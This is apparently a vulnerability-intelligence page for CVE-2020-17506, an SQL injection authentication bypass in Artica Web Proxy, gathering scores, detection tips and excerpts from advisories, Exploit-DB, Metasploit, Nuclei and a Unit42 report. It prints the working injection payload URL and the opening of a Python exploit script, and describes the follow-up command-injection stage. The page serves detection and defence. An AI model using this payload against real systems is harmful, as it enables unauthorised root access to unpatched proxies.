CVE-2020-17506
published 2020-08-12CVE-2020-17506: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the…
PriorityP189critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
93.97%
99.8th percentile
Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| articatech | web_proxy | — | — |
Detection & IOCsextracted from sources · hover to see the quote
path/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;↗
- →Detect CVE-2020-17506 exploitation attempts by matching GET requests to /fw.login.php containing the SQL injection payload with UNION select and the base64-encoded serialized session string in the apikey parameter. ↗
- →After auth bypass, the attacker issues a POST to /cyrus.index.php with the service-cmds-peform parameter containing pipe-delimited OS commands (e.g., ||<cmd>||). Monitor for this pattern as the command injection stage. ↗
- →Successful auth bypass results in a Set-Cookie header containing PHPSESSID and a response body containing the string 'artica-applianc'. Use both as confirmation matchers. ↗
- →The exploit chain combines two stages: (1) unauthenticated SQL injection via apikey in fw.login.php to obtain a privileged session, then (2) authenticated OS command injection via service-cmds-peform in cyrus.index.php, resulting in RCE as root. ↗
- ·The vulnerability is version-specific; only Artica Web Proxy 4.30.00000000 is confirmed affected. Detection rules should be scoped accordingly to reduce false positives against other versions. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-jvgw-6rmv-pw7c: Artica Web Proxy 4
ghsa_unreviewed·2022-05-24
CVE-2020-17506 [HIGH] CWE-89 GHSA-jvgw-6rmv-pw7c: Artica Web Proxy 4
Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
VulnCheck
articatech web_proxy Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2020·CVSS 9.8
CVE-2020-17506 [CRITICAL] articatech web_proxy Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
articatech web_proxy Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
Affected: articatech web_proxy
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-01&host_type=src&vulnerability=cve-2020-17506; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-25&host_type=src&vulnerability=cve-2020-17506; https://dashboard.s
No detection rules found.
Exploit-DB
Artica Proxy 4.3.0 - Authentication Bypass
exploitdb·2020-08-13·CVSS 9.8
CVE-2020-17506 [CRITICAL] Artica Proxy 4.3.0 - Authentication Bypass
Artica Proxy 4.3.0 - Authentication Bypass
---
# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-08-13
# Exploit Author: Dan Duffy
# Vendor Homepage: http://articatech.net/
# Software Link: http://articatech.net/download2x.php?IsoOnly=yes
# Version: 4.30.00000000 (REQUIRED)
# Tested on: Debian
# CVE : CVE-2020-17506
import requests
import argparse
from bs4 import BeautifulSoup
def bypass_auth(session, args):
login_endpoint = "/fw.login.php?apikey="
payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
print("[+] Bypassing authentication...")
session.get(args.host + login_endpoint + payload, verify=False)
return session
def run_command(session, args):
cmd_endpoint =
Metasploit
Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection
metasploit
Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection
Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection
This module exploits an authenticated command injection vulnerability in Artica Proxy, combined with an authentication bypass discovered on the same version, it is possible to trigger the vulnerability without knowing the credentials. The application runs in virtual appliance, successful exploitation of this vulnerability yields remote code execution as root on the remote system.
Nuclei
Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection
nuclei·CVSS 9.8
CVE-2020-17506 [CRITICAL] Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection
Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection
Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
Template:
id: CVE-2020-17506
info:
name: Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection
author: dwisiswant0
severity: critical
description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakag
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (August-October 2020)
Yue Guan
Lei Xu
Ken Hsu
Zhibin Zhang
Published: January 22, 2021
Malware
Trend Reports
Vulnerabilities
DDoS
Exploits
IoT
Network security trends
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823 , which were the most commonly exploited vulnerabilities in the wild in early summer 2020 , are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213 , have emerged and were being utilized at a constant and concern
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823, which were the most commonly exploited vulnerabilities in the wild in early summer 2020, are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213, have emerged and were being utilized at a constant and concerning rate as of fall 2020. To complicate matters, malicious actors are well aware that new exploits aren’t always needed to get the job done. Based on observations of malicious traffic for the designated three months, weaponized ThinkPHP vulnerabilities like CVE-2018-20062 and CVE-2019-908
http://packetstormsecurity.com/files/158868/Artica-Proxy-4.3.0-Authentication-Bypass.htmlhttp://packetstormsecurity.com/files/159267/Artica-Proxy-4.30.000000-Authentication-Bypass-Command-Injection.htmlhttps://blog.max0x4141.com/post/artica_proxy/http://packetstormsecurity.com/files/158868/Artica-Proxy-4.3.0-Authentication-Bypass.htmlhttp://packetstormsecurity.com/files/159267/Artica-Proxy-4.30.000000-Authentication-Bypass-Command-Injection.htmlhttps://blog.max0x4141.com/post/artica_proxy/
2020-08-12
Published
Exploited in the wild